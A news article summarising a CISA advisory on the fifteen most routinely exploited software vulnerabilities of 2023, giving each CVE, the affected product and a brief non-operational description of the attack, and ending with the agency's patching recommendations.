The US Cybersecurity and Infrastructure Security Agency (CISA) has listed the 15 most exploited software flaws and is urging all organizations to implement recommended mitigations. The list includes critical flaws in software products from Microsoft, Cisco, Citrix, and other vendors.
Using the flaws, threat actors can bypass authentication, inject code, escalate privileges, run remote code (RCE), and steal data.
All listed flaws are from 2023, and organizations have had plenty of time to apply patches and other mitigations.
However, hackers increasingly rely on zero-day vulnerabilities that are not disclosed and patched. Last year, the majority of frequently exploited flaws initially appeared as zero-days.
“Malicious cyber actors exploited more zero-day vulnerabilities to compromise enterprise networks in 2023 compared to 2022, allowing them to conduct operations against high-priority targets,” the advisory reads.
Once an exploit appears in the wild, hackers have the most success using it within two years after public disclosure. Cybersecurity agencies from five countries want to reduce this lifespan.
The top 15 routinely exploited vulnerabilities
- Citrix NetScaler ADC and NetScaler Gateway are affected by code injection vulnerability CVE-2023-3519. It allows unauthenticated attackers to cause a stack buffer overflow by sending HTTP Get requests to a particular process (NSPPE) in a system.
- Citrix NetScaler ADC and NetScaler Gateway are also affected by the buffer overflow vulnerability CVE-2023-4966. This vulnerability can be exploited to leak session tokens.
- Cisco’s web-based management interface for IOS XE (an operating system running in networking products) is affected by privilege escalation vulnerability CVE-2023-20198. Unauthorized attackers can use it to gain initial access and issue a command to create a local user and password combination, resulting in the ability to log in with normal user access.
- Cisco IOS XE is also vulnerable to a Web UI command injection flaw, CVE-2023-20273, which could be further used to gain root privileges once a local user has been created.
- Fortinet FortiOS and FortiProxy SSL-VPN, the software powering firewalls and other security devices, was found to be vulnerable to a heap-based buffer overflow flaw, CVE-2023-27997. It enables remote attackers to craft specific requests to execute arbitrary code or commands.
- Progress MOVEit Transfer bug CVE-2023-34362 has been abused for SQL injection to obtain a sysadmin API access token and gain remote code execution via this access by abusing a deserialization call.
- Atlassian Confluence Data Center and Server, a collaboration platform, is affected by a broken access control bug, CVE-2023-22515. Attackers exploit it to create administrator users and upload harmful plugins, essentially taking over the system's control.
- Apache’s Log4j library, a widely used open-source logging tool, is vulnerable to an RCE flaw known as Log4Shell, or CVE-2021-44228. Attackers can send specially crafted requests to vulnerable systems, causing them to run arbitrary code. Hackers can then exfiltrate information, launch ransomware, or conduct other malicious activity. This flaw is still exploited despite being disclosed in 2021.
- Barracuda Networks Email Security Gateway (ESG) appliances did not properly validate input, leading to a critical remote command injection vulnerability, CVE-2023-2868. Attackers exploit it to obtain unauthorized access and execute commands remotely.
- Zoho ManageEngine, a set of IT management tools, is vulnerable to an unauthenticated remote code execution flaw, CVE-2022-47966. Attackers run arbitrary code by providing a crafted samlResponse XML to the ServiceDesk Plus SAML endpoint.
- PaperCut MF/NG, printing control and management system, had an improper access control flaw, CVE-2023-27350. Attackers abuse it to bypass authentication and then execute code via built-in scripting functionality.
- Microsoft Netlogon, a Windows service for secure authentication and communication between network devices, is affected by a privilege escalation bug, CVE-2020-1472. Attackers use non-default configurations to establish a vulnerable connection to a domain controller via the Netlogon Remote Protocol. Discovered in 2020, this flaw continues to be among the top routinely exploited vulnerabilities for the third year in a row.
- JetBrains TeamCity servers, used for software development automation, are vulnerable to an authentication bypass flaw, CVE-2023-42793, that allows attackers to run remote code.
- Microsoft Office Outlook, a popular email client, is affected by a privilege escalation vulnerability, CVE-2023-23397. Threat actors exploit it by sending specially crafted emails that automatically trigger when Outlook processes them without user interaction.
- ownCloud graphapi, an interface for managing data on the file-sharing platform, discloses information to unauthenticated attackers due to the CVE-2023-49103 flaw. Hackers can access admin passwords, mail server credentials, license keys, and other sensitive data.
Cyber authorities also listed dozens of other vulnerabilities that attackers routinely exploit. The advisory includes recommended mitigations for vendors, developers, and users.
CISA recommends prompt software and firmware updates, prioritizing critical vulnerabilities, performing routine asset discovery, and implementing a centralized patch management system, among other measures.
Your email address will not be published. Required fields are markedmarked